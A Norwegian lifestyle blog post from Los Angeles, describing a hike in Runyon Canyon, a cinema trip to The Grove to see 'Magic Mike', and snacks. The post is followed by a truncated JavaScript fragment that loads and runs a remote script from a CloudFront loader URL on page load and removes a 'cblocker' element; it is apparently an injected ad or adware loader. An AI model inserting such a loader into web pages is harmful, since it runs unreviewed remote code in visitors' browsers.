Up,up closer to the top

Det går i ett her i Hollywood!

Endelig har jeg fått igang internett, arbeid og ting begynner å falle på plass.

Treningen går så det suser! I dag tråkket vi opp løypen som kalles “Hero” i Runyon Canyon, den er hard skal jeg si dere.

Bratt og beintøft

Svetten siler mens man kaver seg opp bakken og solen virkelig steiker på hele kroppen. Klokken er 07:00 og gradestokken viser allerede 33 grader. Det har vært varmerekord etter varmerekord over LA denne uken og det ser ikke ut til å gi seg riktig enda. Det er varmt, men det er skikkelig deilig også.

i helgen fikk jeg en kosedag.

Oh yes!

Da dro vi på kino og så den fantastiske “Magic Mike” med verdens kjekkeste, Channing Tatum (Autshhj) i heftige strippescener med sinnsykt kule dance-moves.

Dette er en fryd for øyet jenter!

Vi dro på min favorittkino her i LA. Den ligger på kjøpesenteret The Grove som er en helt nydelig handlegate som er bygget opp på gammeldags vis og som spiller Frank Sinatra i gatene. Hollywood idyll!

Utsikt over The Grove

En av mine favorittplasser i LA.

Og når det er lørdag, og man er på kino…

Hello Kitty kos..det blir ikke søtere enn dette. Bokstavelig talt!

da får man unne seg litt “kinoGodt”

Nå skal jeg jobbe litt før det er en ny treningsøkt med vår dyktige PT! pjo, la oss håpe jeg ikke smelter bort! 😉

Ine Therese, Los Angeles 13.august., 10:08

 // -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>